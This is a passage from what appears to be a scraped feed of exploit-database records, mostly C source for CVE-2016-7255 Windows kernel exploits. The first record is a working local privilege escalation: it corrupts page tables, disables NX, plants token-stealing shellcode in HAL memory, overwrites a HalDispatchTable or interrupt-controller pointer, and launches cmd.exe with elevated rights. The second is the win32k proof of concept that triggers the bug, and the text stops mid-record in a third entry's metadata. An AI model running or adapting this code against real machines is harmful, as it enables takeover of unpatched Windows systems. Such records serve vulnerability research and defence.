0xFF8)\r\n\t{\r\n\t\tif ((*(PVOID *)pml4_search) == 0x0)\r\n\t\t{\r\n\t\t\t// This is a NULL (free) entry\r\n\t\t\tbreak;\r\n\t\t}\r\n\t\toffset += 8;\r\n\t\tpml4_search = PML4_BASE + offset;\r\n\t}\r\n\treturn pml4_search;\r\n}\r\n\r\nUINT64 calculate_spurious_pt_address(UINT64 spurious_offset) {\r\n\tUINT64 index = (spurious_offset & 0xFFF) / 8;\r\n\tUINT64 result = (\r\n\t\t((UINT64)0xFFFF << 48) |\r\n\t\t((UINT64)PML4_SELF_REF_INDEX << 39) |\r\n\t\t((UINT64)PML4_SELF_REF_INDEX << 30) |\r\n\t\t((UINT64)PML4_SELF_REF_INDEX << 21) |\r\n\t\t(index << 12)\r\n\t\t);\r\n\treturn result;\r\n}\r\n\r\n\r\n\r\nUINT64 create_spurious_pte_to_virtual_address(UINT64 virtual_address, BOOL patch_original) {\r\n\r\n\t/*\r\n\t1: kd> !pte ffffffff`ffd00000\r\n\tVA ffffffffffd00000\r\n\tPXE at FFFFF6FB7DBEDFF8 PPE at FFFFF6FB7DBFFFF8 PDE at FFFFF6FB7FFFFFF0 PTE at FFFFF6FFFFFFE800\r\n\tcontains 0000000000A1F063 contains 0000000000A20063 contains 0000000000A25063 contains 8000000000103963\r\n\tpfn a1f-- - DA--KWEV pfn a20-- - DA--KWEV pfn a25-- - DA--KWEV pfn 103 - G - DA--KW - V\r\n\t*/\t\r\n\r\n\tUINT64 pte = get_pxe_address(virtual_address);\r\n\tint pte_offset = pte & 0xFFF;\r\n\t//printf(\"PTE: %llx, %x\\n\", pte, pte_offset);\r\n\t\r\n\tUINT64 pde = get_pxe_address(pte);\r\n\tint pde_offset = pde & 0xFFF;\r\n\t//printf(\"PDE: %llx, %x\\n\", pde, pde_offset);\r\n\t\t\r\n\tUINT64 pdpte = get_pxe_address(pde);\r\n\tint pdpte_offset = pdpte & 0xFFF;\r\n\t//printf(\"PDPTE: %llx,%x\\n\", pdpte, pdpte_offset);\r\n\t\t\r\n\tUINT64 pml4e = get_pxe_address(pdpte);\r\n\tint pml4e_offset = pml4e & 0xFFF;\r\n\t//printf(\"PML4E: %llx\\n\", pml4e, pml4e_offset);\r\n\t\r\n\tUINT64 spurious_offset = look_free_entry_pml4();\r\n\tprintf(\"[+] Selected spurious PML4E: %llx\\n\", spurious_offset);\r\n\tUINT64 f_e_pml4 = spurious_offset;\r\n\tUINT64 spurious_pt = calculate_spurious_pt_address(spurious_offset);\r\n\tprintf(\"[+] Spurious PT: %llx\\n\", 
spurious_pt);\r\n\tprintf(\"--------------------------------------------------\\n\\n\");\r\n\t\r\n\t\r\n\t//Read the physical address of pml4e\t\r\n\tUINT64 pml4e_pfn = (UINT64)(*(PVOID *)pml4e);\r\n\tprintf(\"[+] Content pml4e %llx: %llx\\n\", pml4e, pml4e_pfn);\r\n\t// Change the PxE\r\n\tpml4e_pfn = pml4e_pfn | 0x67; // Set U/S\r\n\t\r\n\tprintf(\"[+] Patching the Spurious Offset (PML4e) %llx: %llx\\n\",f_e_pml4, pml4e_pfn);\r\n\t*((PVOID *)spurious_offset) = (PVOID)pml4e_pfn;\r\n\tSleep(0x1); // Sleep for TLB refresh;\r\n\t\r\n\t//Read the physical address of pdpte\r\n\tUINT64 pdpte_pfn = (UINT64) *(PVOID *)(spurious_pt + pdpte_offset);\r\n\tprintf(\"[+] Content pdpte %llx: %llx\\n\", pdpte, pdpte_pfn);\r\n\t// Change the PxE\r\n\tpdpte_pfn = pdpte_pfn | 0x67; // Set U/S\r\n\tprintf(\"[+] Patching the Spurious Offset (PDPTE) %llx: %llx\\n\", spurious_offset, pdpte_pfn);\r\n\t*((PVOID *)spurious_offset) = (PVOID)pdpte_pfn;\r\n\tSleep(0x1); // Sleep for TLB refresh;\r\n\t\r\n\t//Read the physical address of pde\r\n\tUINT64 pde_addr = spurious_pt + pde_offset;\r\n\tUINT64 pde_pfn = (UINT64) *(PVOID *)(spurious_pt + pde_offset);\r\n\tprintf(\"[+] Content pdpe %llx: %llx\\n\", pde, pde_pfn);\r\n\t// Change the PxE\r\n\tpde_pfn = pde_pfn | 0x67; // Set U/S\r\n\tprintf(\"[+] Patching the Spurious Offset (PDE) %llx: %llx\\n\", spurious_offset, pde_pfn);\r\n\t*((PVOID *)spurious_offset) = (PVOID)pde_pfn;\r\n\tSleep(0x1); // Sleep for TLB refresh;\r\n\t\r\n\t//Read the physical address of pte\r\n\tUINT64 pte_addr = spurious_pt + pte_offset;\r\n\tUINT64 pte_pfn = (UINT64) *(PVOID *)(spurious_pt + pte_offset);\r\n\tprintf(\"[+] Content pte %llx: %llx\\n\", pte, pte_pfn);\r\n\t// Change the PxE\r\n\tpte_pfn = pte_pfn | 0x67; // Set U/S\r\n pte_pfn = pte_pfn & 0x7fffffffffffffff; // Turn off NX \r\n\tif (patch_original) {\r\n\t\tprintf(\"*** Patching the original location to enable NX...\\n\");\r\n\t\t*(PVOID *)(spurious_pt + pte_offset) = (PVOID)pte_pfn;\r\n\t}\r\n 
\r\n\tprintf(\"[+] Patching the Spurious Offset (PTE) %llx: %llx\\n\", spurious_offset, pte_pfn);\r\n\t*((PVOID *)spurious_offset) = (PVOID)pte_pfn;\r\n\tSleep(0x1); // Sleep for TLB refresh;\r\n\tprintf(\"\\n\\n\");\r\n\treturn spurious_pt;\r\n}\r\n\r\nUINT64 get_OverwriteAddress_pointer(UINT64 target_address, int target_offset) {\r\n\tprintf(\"[*] Getting Overwrite pointer: %llx\\n\", target_address);\r\n\tUINT64 OverwriteAddress = create_spurious_pte_to_virtual_address(target_address, FALSE);\r\n\tOverwriteAddress += (target_address & 0xFFF);\r\n\tprintf(\"OverwriteAddress: %llx\\n\", OverwriteAddress);\r\n\treturn (UINT64) *((PVOID *)(((char *)OverwriteAddress) + target_offset));\r\n}\r\n\r\nvoid overwrite_TargetAddress(UINT64 hook_address, UINT64 target_address, int target_offset) {\r\n\tUINT64 OverwriteTarget = create_spurious_pte_to_virtual_address(target_address, FALSE);\r\n\tOverwriteTarget += (target_address & 0xFFF);\r\n\tUINT64 target = (UINT64)((char *)OverwriteTarget) + target_offset;\r\n\tprintf(\"Patch OverwriteTarget: %llx with %llx\\n\", target, hook_address);\r\n\t*(PVOID *)target = (PVOID)hook_address;\r\n}\r\n\r\n\r\nUINT64 store_shellcode_in_hal(void) {\r\n\t//// Finally store the shellcode on the HAL\r\n\r\n\tUINT64 hal_heap_addr = 0xFFFFFFFFFFD00000;\r\n\tUINT64 hal_heap = create_spurious_pte_to_virtual_address(hal_heap_addr, TRUE);\r\n\r\n\tprintf(\"HAL address: %llx\\n\", hal_heap);\r\n\t// 0xffffffffffd00d50 this is a good offset to store shellcode \r\n\t// 0xfff - 0xd50 = 0x2af space\r\n\r\n\tmemcpy(((char *)hal_heap) + 0xd50, shellcode, sizeof(shellcode));\r\n\treturn 0xffffffffffd00d50;\r\n}\r\n\r\nUINT64 GetHalDispatchTable() {\r\n PCHAR KernelImage;\r\n SIZE_T ReturnLength;\r\n HMODULE hNtDll = NULL;\r\n UINT64 HalDispatchTable;\r\n HMODULE hKernelInUserMode = NULL;\r\n PVOID KernelBaseAddressInKernelMode;\r\n NTSTATUS NtStatus = STATUS_UNSUCCESSFUL;\r\n PSYSTEM_MODULE_INFORMATION pSystemModuleInformation;\r\n\r\n hNtDll = 
LoadLibrary(\"ntdll.dll\");\r\n\r\n if (!hNtDll) {\r\n printf(\"\\t\\t\\t[-] Failed To Load NtDll.dll: 0x%X\\n\", GetLastError());\r\n exit(EXIT_FAILURE);\r\n }\r\n\r\n NtQuerySystemInformation = (NtQuerySystemInformation_t)GetProcAddress(hNtDll, \"NtQuerySystemInformation\");\r\n\r\n if (!NtQuerySystemInformation) {\r\n printf(\"\\t\\t\\t[-] Failed Resolving NtQuerySystemInformation: 0x%X\\n\", GetLastError());\r\n exit(EXIT_FAILURE);\r\n }\r\n\r\n NtStatus = NtQuerySystemInformation(SystemModuleInformation, NULL, 0, &ReturnLength);\r\n\r\n // Allocate the Heap chunk\r\n pSystemModuleInformation = (PSYSTEM_MODULE_INFORMATION)HeapAlloc(GetProcessHeap(),\r\n HEAP_ZERO_MEMORY,\r\n ReturnLength);\r\n\r\n if (!pSystemModuleInformation) {\r\n printf(\"\\t\\t\\t[-] Memory Allocation Failed For SYSTEM_MODULE_INFORMATION: 0x%X\\n\", GetLastError());\r\n exit(EXIT_FAILURE);\r\n }\r\n NtStatus = NtQuerySystemInformation(SystemModuleInformation,\r\n pSystemModuleInformation,\r\n ReturnLength,\r\n &ReturnLength);\r\n\r\n if (NtStatus != STATUS_SUCCESS) {\r\n printf(\"\\t\\t\\t[-] Failed To Get SYSTEM_MODULE_INFORMATION: 0x%X\\n\", GetLastError());\r\n exit(EXIT_FAILURE);\r\n }\r\n\r\n KernelBaseAddressInKernelMode = pSystemModuleInformation->Module[0].Base;\r\n KernelImage = strrchr((PCHAR)(pSystemModuleInformation->Module[0].ImageName), '\\\\') + 1;\r\n\r\n printf(\"\\t\\t\\t[+] Loaded Kernel: %s\\n\", KernelImage);\r\n printf(\"\\t\\t\\t[+] Kernel Base Address: 0x%p\\n\", KernelBaseAddressInKernelMode);\r\n \r\n hKernelInUserMode = LoadLibraryA(KernelImage);\r\n\r\n if (!hKernelInUserMode) {\r\n printf(\"\\t\\t\\t[-] Failed To Load Kernel: 0x%X\\n\", GetLastError());\r\n exit(EXIT_FAILURE);\r\n }\r\n\r\n // This is still in user mode\r\n HalDispatchTable = (UINT64)GetProcAddress(hKernelInUserMode, \"HalDispatchTable\");\r\n\r\n if (!HalDispatchTable) {\r\n printf(\"\\t\\t\\t[-] Failed Resolving HalDispatchTable: 0x%X\\n\", GetLastError());\r\n exit(EXIT_FAILURE);\r\n }\r\n 
else {\r\n HalDispatchTable = (ULONGLONG)HalDispatchTable - (ULONGLONG)hKernelInUserMode;\r\n\r\n // Here we get the address of HapDispatchTable in Kernel mode\r\n HalDispatchTable = ((ULONGLONG)HalDispatchTable + (ULONGLONG)KernelBaseAddressInKernelMode);\r\n printf(\"\\t\\t\\t[+] HalDispatchTable: 0x%llx\\n\", HalDispatchTable);\r\n }\r\n\r\n HeapFree(GetProcessHeap(), 0, (LPVOID)pSystemModuleInformation);\r\n\r\n if (hNtDll) {\r\n FreeLibrary(hNtDll);\r\n }\r\n\r\n if (hKernelInUserMode) {\r\n FreeLibrary(hKernelInUserMode);\r\n }\r\n\r\n hNtDll = NULL;\r\n hKernelInUserMode = NULL;\r\n pSystemModuleInformation = NULL;\r\n\r\n return HalDispatchTable;\r\n}\r\n\r\nint __cdecl main(int argc, char** argv)\r\n{\r\n\tTCHAR pre_username[256];\r\n\tTCHAR post_username[256];\r\n\tDWORD size = 256;\r\n\tULONG Interval = 0;\r\n\tHMODULE hNtDll = NULL;\r\n\tUINT retval;\r\n UINT64 overwrite_address;\r\n int overwrite_offset;\r\n \r\n // define operating system version specific variables\r\n unsigned char sc_KPROCESS;\r\n unsigned int sc_TOKEN;\r\n unsigned int sc_APLINKS;\r\n\tint osversion;\r\n\r\n\tif (argc != 2) {\r\n\t\tprintf(\"Please enter an OS version\\n\");\r\n\t\tprintf(\"The following OS'es are supported:\\n\");\r\n\t\tprintf(\"\\t[*] 7 - Windows 7\\n\");\r\n\t\tprintf(\"\\t[*] 81 - Windows 8.1\\n\");\r\n\t\tprintf(\"\\t[*] 10 - Windows 10 prior to build release 14393 (Anniversary Update)\\n\");\r\n\t\tprintf(\"\\t[*] 12 - Windows 2012 R2\\n\");\r\n\t\tprintf(\"\\n\");\r\n\t\tprintf(\"\\t[*] For example: cve-2016-7255.exe 7 -- for Windows 7\\n\");\r\n\t\treturn -1;\r\n\t}\r\n\t\r\n\tosversion = _strtoui64(argv[1], NULL, 10);\r\n\t\r\n if(osversion == 7) \r\n {\r\n // the target machine's OS is Windows 7 SP1\r\n printf(\" [+] Windows 7 SP1\\n\");\r\n sc_KPROCESS = 0x70;\t\t\t// dt -r1 nt!_KTHREAD +0x050 ApcState : _KAPC_STATE -> +0x020 Process : Ptr64 _KPROCESS\r\n sc_TOKEN = 0x80;\t\t\t// dt -r1 nt!_EPROCESS [+0x208 Token : _EX_FAST_REF] - [+0x188 
ActiveProcessLinks : _LIST_ENTRY] = (0x80)\r\n sc_APLINKS = 0x188;\t\t// dt -r1 nt!_EPROCESS +0x188 ActiveProcessLinks : _LIST_ENTRY\r\n \r\n overwrite_address = GetHalDispatchTable(); // HalDispatchTable\r\n overwrite_offset = 0x8; \t\t\t\t// QueryIntervalProfile \r\n }\r\n\telse if(osversion == 81)\r\n {\r\n // the target machine's OS is Windows 8.1\r\n printf(\" [+] Windows 8.1\\n\");\r\n sc_KPROCESS = 0xB8; // dt -r1 nt!_KTHREAD +0x098 ApcState : _KAPC_STATE -> +0x020 Process : Ptr64 _KPROCESS\r\n sc_TOKEN = 0x60; // dt -r1 nt!_EPROCESS [+0x348 Token : _EX_FAST_REF] - [+0x2e8 ActiveProcessLinks : _LIST_ENTRY] = (0x60)\r\n sc_APLINKS = 0x2e8; \t// dt -r1 nt!_EPROCESS +0x2e8 ActiveProcessLinks : _LIST_ENTRY\r\n \r\n overwrite_address = 0xffffffffffd00510; // HalpInterruptController_address (dq poi(hal!HalpInterruptController))\r\n overwrite_offset = 0x78; // HalpApicRequestInterruptOffset (dq halpApicRequestInterrupt)\r\n }\r\n\telse if(osversion == 10)\r\n {\r\n // the target machine's OS is Windows 10 prior to build 14393\r\n printf(\" [+] Windows 10\\n\");\r\n sc_KPROCESS = 0xB8; // dt -r1 nt!_KTHREAD +0x098 ApcState : _KAPC_STATE -> +0x020 Process : Ptr64 _KPROCESS\r\n sc_TOKEN = 0x68; // dt -r1 nt!_EPROCESS [+0x358 Token : _EX_FAST_REF] - [+0x2f0 ActiveProcessLinks : _LIST_ENTRY] = (0x60)\r\n sc_APLINKS = 0x2f0; // dt -r1 nt!_EPROCESS +0x2f0 ActiveProcessLinks : _LIST_ENTRY\r\n \r\n overwrite_address = 0xffffffffffd004c0; // HalpInterruptController_address (dq poi(hal!HalpInterruptController)\r\n overwrite_offset = 0x78; // HalpApicRequestInterruptOffset (dq halpApicRequestInterrupt)\r\n }\r\n\telse if(osversion == 12)\r\n {\r\n // the target machine's OS is Windows 2012 R2\r\n printf(\" [+] Windows 2012 R2\\n\");\r\n sc_KPROCESS = 0xB8; // dt -r1 nt!_KTHREAD +0x098 ApcState : _KAPC_STATE -> +0x020 Process : Ptr64 _KPROCESS\r\n sc_TOKEN = 0x60; // dt -r1 nt!_EPROCESS [+0x348 Token : _EX_FAST_REF] - [+0x2e8 ActiveProcessLinks : _LIST_ENTRY] = (0x60)\r\n 
sc_APLINKS = 0x2e8; // dt -r1 nt!_EPROCESS +0x2e8 ActiveProcessLinks : _LIST_ENTRY\r\n \r\n overwrite_address = 0xffffffffffd12c70; // HalpInterruptController_address (dq poi(hal!HalpInterruptController)\r\n overwrite_offset = 0x78; // HalpApicRequestInterruptOffset (dq halpApicRequestInterrupt)\r\n }\r\n // in case the OS version is not any of the previously checked versions\r\n else\r\n {\r\n printf(\" [-] Unsupported version\\n\");\r\n printf(\" [*] Affected 64-bit operating systems\\n\");\r\n printf(\" [*] Windows 7 SP1 -- cve-2016-7255.exe 7\\n\");\r\n\t\tprintf(\" [*] Windows 8.1 -- cve-2016-7255.exe 81\\n\");\r\n\t\tprintf(\" [*] Windows 10 before build 14393 -- cve-2016-7255.exe 10\\n\");\r\n\t\tprintf(\"\t\t [*] Windows 2012 R2\t\t\t -- cve-2016-7255.exe 12\\n\");\r\n return -1;\r\n }\r\n \r\n\tprintf(\"My PID is: %d\\n\", GetCurrentProcessId());\r\n GetUserName(pre_username, &size);\r\n\tprintf(\"Current Username: %s\\n\", pre_username);\r\n\tprintf(\"PML4 Self Ref: %llx\\n\", PML4_SELF_REF);\r\n printf(\"Shellcode stored at: %p\\n\", (void *) &shellcode);\r\n\tprintf(\"Enter to continue...\\n\");\r\n\tgetchar();\r\n\r\n\tdo\r\n\t{\r\n\t\tor_address_value_4((void*)PML4_SELF_REF);\r\n\t} while (FALSE);\r\n\r\n\tPML4_SELF_REF_INDEX = GET_INDEX((UINT64)PML4_SELF_REF);\r\n\tprintf(\"[*] Self Ref Index: %x\\n\", PML4_SELF_REF_INDEX);\r\n\tPML4_BASE = ((UINT64)PML4_SELF_REF & (UINT64)0xFFFFFFFFFFFFF000);\r\n\t\r\n UINT64 original_pointer = get_OverwriteAddress_pointer(overwrite_address, overwrite_offset);\r\n\r\n\tprintf(\"Original OverwriteTarget pointer: %llx\\n\", original_pointer);\r\n\tDWORD pid = GetCurrentProcessId();\r\n \r\n /* Shellcode Patching !! 
*/\r\n\tchar *p = shellcode;\r\n\tp += 4; // skip the CLI, PUSHF and MOV RAX bytes\t\r\n\t*(PVOID *)p = (PVOID)original_pointer; // Patch shellcode1\r\n\r\n\tp += 12; // Patch shellcode with original value in the Overwrite address\r\n\t*(PVOID *)p = (PVOID)(overwrite_address + overwrite_offset);\r\n\r\n\tp += 12; // To patch the PID of our process\r\n\t\r\n\t*(DWORD *)p = (DWORD)pid;\r\n \r\n p += 17;\r\n *(unsigned char *)p = (unsigned char)sc_KPROCESS;\r\n \r\n p += 7;\r\n *(unsigned int *)p = (unsigned int)sc_APLINKS;\r\n \r\n p += 20;\r\n *(unsigned int *)p = (unsigned int)sc_TOKEN;\r\n \r\n p += 20;\r\n *(unsigned int *)p = (unsigned int)sc_TOKEN;\r\n \r\n UINT64 shellcode_va = store_shellcode_in_hal();\r\n\tprintf(\"[+] w00t: Shellcode stored at: %llx\\n\", shellcode_va);\r\n\toverwrite_TargetAddress(shellcode_va, overwrite_address, overwrite_offset);\r\n\t\r\n\tif (osversion == 7){\r\n\t\t// Exploit Win7.1\r\n\t\thNtDll = LoadLibrary(\"ntdll.dll\");\r\n\r\n\t\tif (!hNtDll) {\r\n\t\t\tprintf(\"\\t\\t[-] Failed loading NtDll: 0x%X\\n\", GetLastError());\r\n\t\t\texit(EXIT_FAILURE);\r\n\t\t}\r\n\t\r\n\t\tNtQueryIntervalProfile = (NtQueryIntervalProfile_t)GetProcAddress(hNtDll, \"NtQueryIntervalProfile\");\r\n\r\n\t\tif (!NtQueryIntervalProfile) {\r\n\t\t\tprintf(\"\\t\\t[-] Failed Resolving NtQueryIntervalProfile: 0x%X\\n\", GetLastError());\r\n\t\t\texit(EXIT_FAILURE);\r\n\t\t}\t\r\n\t\tNtQueryIntervalProfile(0x1337, &Interval);\r\n\t}\r\n\r\n\t\r\n\twhile (1) {\r\n\t\tsize = 256;\r\n\t\tGetUserName(post_username, &size);\r\n\t\tif (memcmp(post_username, pre_username, 256) != 0) break;\r\n\t}\r\n\tSleep(2000);\r\n\tsystem(\"cmd.exe\");\r\n\r\n\r\n\treturn 0;\r\n}", "sourceHref": "https://www.exploit-db.com/download/41015", "cvss": {"score": 7.2, "vector": "AV:L/AC:L/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2022-05-04T17:38:41", "description": "", "cvss3": {"exploitabilityScore": 1.8, "cvssV3": {"baseSeverity": "HIGH", "confidentialityImpact": "HIGH", 
"attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "LOCAL", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "LOW", "baseScore": 7.8, "vectorString": "CVSS:3.0/AV:L/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H", "version": "3.0", "userInteraction": "NONE"}, "impactScore": 5.9}, "published": "2016-11-09T00:00:00", "type": "exploitdb", "title": "Microsoft Windows Kernel - 'win32k' Denial of Service (MS16-135)", "bulletinFamily": "exploit", "cvss2": {"severity": "HIGH", "exploitabilityScore": 3.9, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 7.2, "vectorString": "AV:L/AC:L/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "LOCAL", "authentication": "NONE"}, "impactScore": 10.0, "obtainUserPrivilege": false}, "cvelist": ["2016-7255", "CVE-2016-0075", "CVE-2016-7255"], "modified": "2016-11-09T00:00:00", "id": "EDB-ID:40745", "href": "https://www.exploit-db.com/exploits/40745", "sourceData": "/*\r\nSource: https://github.com/tinysec/public/tree/master/CVE-2016-7255\r\n\r\nFull Proof of Concept:\r\n\r\nhttps://github.com/tinysec/public/tree/master/CVE-2016-7255\r\nhttps://github.com/offensive-security/exploitdb-bin-sploits/raw/master/bin-sploits/40745.zip\r\n\r\n********************************************************************\r\n Created:\t2016-11-09 14:23:09\r\n Filename: \tmain.c\r\n Author:\troot[at]TinySec.net\r\n Version\t0.0.0.1\r\n Purpose:\tpoc of cve-2016-0075\r\n*********************************************************************\r\n*/\r\n\r\n#include <windows.h>\r\n#include <wchar.h>\r\n#include <stdlib.h>\r\n#include <stdio.h>\r\n\r\n\r\n//////////////////////////////////////////////////////////////////////////\r\n#pragma comment(lib,\"ntdll.lib\")\r\n#pragma comment(lib,\"user32.lib\")\r\n\r\n#undef DbgPrint\r\nULONG 
__cdecl DbgPrintEx( IN ULONG ComponentId, IN ULONG Level, IN PCCH Format, IN ... );\r\nULONG __cdecl DbgPrint(__in char* Format, ...)\r\n{\r\n\tCHAR* pszDbgBuff = NULL;\r\n\tva_list VaList=NULL;\r\n\tULONG ulRet = 0;\r\n\t\r\n\tdo \r\n\t{\r\n\t\tpszDbgBuff = (CHAR*)HeapAlloc(GetProcessHeap(), 0 ,1024 * sizeof(CHAR));\r\n\t\tif (NULL == pszDbgBuff)\r\n\t\t{\r\n\t\t\tbreak;\r\n\t\t}\r\n\t\tRtlZeroMemory(pszDbgBuff,1024 * sizeof(CHAR));\r\n\t\t\r\n\t\tva_start(VaList,Format);\r\n\t\t\r\n\t\t_vsnprintf((CHAR*)pszDbgBuff,1024 - 1,Format,VaList);\r\n\t\t\r\n\t\tDbgPrintEx(77 , 0 , pszDbgBuff );\r\n\t\tOutputDebugStringA(pszDbgBuff);\r\n\t\t\r\n\t\tva_end(VaList);\r\n\t\t\r\n\t} while (FALSE);\r\n\t\r\n\tif (NULL != pszDbgBuff)\r\n\t{\r\n\t\tHeapFree( GetProcessHeap(), 0 , pszDbgBuff );\r\n\t\tpszDbgBuff = NULL;\r\n\t}\r\n\t\r\n\treturn ulRet;\r\n}\r\n\r\n\r\n int _sim_key_down(WORD wKey)\r\n {\r\n\t INPUT stInput = {0};\r\n\t \r\n\t do \r\n\t {\r\n\t\t stInput.type = INPUT_KEYBOARD;\r\n\t\t stInput.ki.wVk = wKey;\r\n\t\t stInput.ki.dwFlags = 0;\r\n\t\t \r\n\t\t SendInput(1 , &stInput , sizeof(stInput) );\r\n\r\n\t } while (FALSE);\r\n\t \r\n\t return 0;\r\n}\r\n\r\n int _sim_key_up(WORD wKey)\r\n {\r\n\t INPUT stInput = {0};\r\n\t \r\n\t do \r\n\t {\r\n\t\t stInput.type = INPUT_KEYBOARD;\r\n\t\t stInput.ki.wVk = wKey;\r\n\t\t stInput.ki.dwFlags = KEYEVENTF_KEYUP;\r\n\t\t \r\n\t\t SendInput(1 , &stInput , sizeof(stInput) );\r\n\t\t \r\n\t } while (FALSE);\r\n\t \r\n\t return 0;\r\n}\r\n\r\n int _sim_alt_shift_esc()\r\n {\r\n\t int i = 0;\r\n\t \r\n\t do \r\n\t {\r\n\t\t _sim_key_down( VK_MENU );\r\n\t\t _sim_key_down( VK_SHIFT );\t \r\n\t\t \r\n\t\t\r\n\t\t_sim_key_down( VK_ESCAPE);\r\n\t\t_sim_key_up( VK_ESCAPE);\r\n\r\n\t\t_sim_key_down( VK_ESCAPE);\r\n\t\t_sim_key_up( VK_ESCAPE);\r\n\t\t\t \r\n\t\t _sim_key_up( VK_MENU );\r\n\t\t _sim_key_up( VK_SHIFT );\t \t \r\n\t\t \r\n\t\t \r\n\t } while (FALSE);\r\n\t \r\n\t return 0;\r\n}\r\n\r\n \r\n\r\n int 
_sim_alt_shift_tab(int nCount)\r\n {\r\n\t int i = 0;\r\n\t HWND hWnd = NULL;\r\n\r\n\r\n\t int nFinalRet = -1;\r\n\r\n\t do \r\n\t {\r\n\t\t _sim_key_down( VK_MENU );\r\n\t\t _sim_key_down( VK_SHIFT );\t \r\n\r\n\r\n\t\t for ( i = 0; i < nCount ; i++)\r\n\t\t {\r\n\t\t\t _sim_key_down( VK_TAB);\r\n\t\t\t _sim_key_up( VK_TAB);\r\n\t\t\t \r\n\t\t\t Sleep(1000);\r\n\r\n\t\t }\r\n\t\r\n\t\t \r\n\t\t_sim_key_up( VK_MENU );\r\n\t\t _sim_key_up( VK_SHIFT );\t \r\n\t } while (FALSE);\r\n\t \r\n\t return nFinalRet;\r\n}\r\n\r\n\r\n\r\nint or_address_value_4(__in void* pAddress)\r\n{\r\n\tWNDCLASSEXW stWC = {0};\r\n\r\n\tHWND\thWndParent = NULL;\r\n\tHWND\thWndChild = NULL;\r\n\r\n\tWCHAR*\tpszClassName = L\"cve-2016-7255\";\r\n\tWCHAR*\tpszTitleName = L\"cve-2016-7255\";\r\n\r\n\tvoid*\tpId = NULL;\r\n\tMSG\t\tstMsg = {0};\r\n\r\n\tdo \r\n\t{\r\n\r\n\t\tstWC.cbSize = sizeof(stWC);\r\n\t\tstWC.lpfnWndProc = DefWindowProcW;\r\n\t\tstWC.lpszClassName = pszClassName;\r\n\t\t\r\n\t\tif ( 0 == RegisterClassExW(&stWC) )\r\n\t\t{\r\n\t\t\tbreak;\r\n\t\t}\r\n\r\n\t\thWndParent = CreateWindowExW(\r\n\t\t\t0,\r\n\t\t\tpszClassName,\r\n\t\t\tNULL,\r\n\t\t\tWS_OVERLAPPEDWINDOW|WS_VISIBLE,\r\n\t\t\t0,\r\n\t\t\t0,\r\n\t\t\t360,\r\n\t\t\t360,\r\n\t\t\tNULL,\r\n\t\t\tNULL,\r\n\t\t\tGetModuleHandleW(NULL),\r\n\t\t\tNULL\r\n\t\t);\r\n\r\n\t\tif (NULL == hWndParent)\r\n\t\t{\r\n\t\t\tbreak;\r\n\t\t}\r\n\r\n\t\thWndChild = CreateWindowExW(\r\n\t\t\t0,\r\n\t\t\tpszClassName,\r\n\t\t\tpszTitleName,\r\n\t\t\tWS_OVERLAPPEDWINDOW|WS_VISIBLE|WS_CHILD,\r\n\t\t\t0,\r\n\t\t\t0,\r\n\t\t\t160,\r\n\t\t\t160,\r\n\t\t\thWndParent,\r\n\t\t\tNULL,\r\n\t\t\tGetModuleHandleW(NULL),\r\n\t\t\tNULL\r\n\t\t);\r\n\t\t\r\n\t\tif (NULL == hWndChild)\r\n\t\t{\r\n\t\t\tbreak;\r\n\t\t}\r\n\r\n\t\t#ifdef _WIN64\r\n\t\t\tpId = ( (UCHAR*)pAddress - 0x28 ); \r\n\t\t#else\r\n\t\t\tpId = ( (UCHAR*)pAddress - 0x14); \r\n\t\t#endif // #ifdef _WIN64\r\n\t\t\r\n\t\tSetWindowLongPtr(hWndChild , GWLP_ID , (LONG_PTR)pId 
);\r\n\r\n\t\tDbgPrint(\"hWndChild = 0x%p\\n\" , hWndChild);\r\n\t\tDebugBreak();\r\n\r\n\t\tShowWindow(hWndParent , SW_SHOWNORMAL);\r\n\r\n\t\tSetParent(hWndChild , GetDesktopWindow() );\r\n\r\n\t\tSetForegroundWindow(hWndChild);\r\n\r\n\t\t_sim_alt_shift_tab(4);\r\n\t\t\r\n\t\tSwitchToThisWindow(hWndChild , TRUE);\r\n\t\t\r\n\t\t_sim_alt_shift_esc();\r\n\r\n\r\n\t\twhile( GetMessage(&stMsg , NULL , 0 , 0) )\r\n\t\t{\t\r\n\t\t\tTranslateMessage(&stMsg);\r\n\t\t\tDispatchMessage(&stMsg);\r\n\t\t}\r\n\t\r\n\r\n\t} while (FALSE);\r\n\r\n\tif ( NULL != hWndParent )\r\n\t{\r\n\t\tDestroyWindow(hWndParent);\r\n\t\thWndParent = NULL;\r\n\t}\r\n\r\n\tif ( NULL != hWndChild )\r\n\t{\r\n\t\tDestroyWindow(hWndChild);\r\n\t\thWndChild = NULL;\r\n\t}\r\n\r\n\tUnregisterClassW(pszClassName , GetModuleHandleW(NULL) );\r\n\r\n\treturn 0;\r\n}\r\n\r\nint __cdecl wmain(int nArgc, WCHAR** Argv)\r\n{\r\n\tdo \r\n\t{\r\n\t\tor_address_value_4( (void*)0xFFFFFFFF );\r\n\t} while (FALSE);\r\n\t\r\n\treturn 0;\r\n}", "sourceHref": "https://www.exploit-db.com/download/40745", "cvss": {"score": 7.2, "vector": "AV:L/AC:L/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2022-01-13T05:32:52", "description": "", "cvss3": {"exploitabilityScore": 1.8, "cvssV3": {"baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "LOCAL", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "baseScore": 7.8, "privilegesRequired": "LOW", "vectorString": "CVSS:3.0/AV:L/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H", "userInteraction": "NONE", "version": "3.0"}, "impactScore": 5.9}, "published": "2019-05-15T00:00:00", "type": "exploitdb", "title": "Microsoft Windows - 'Win32k' Local Privilege Escalation", "bulletinFamily": "exploit", "cvss2": {"severity": "HIGH", "exploitabilityScore": 3.9, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "COMPLETE", 
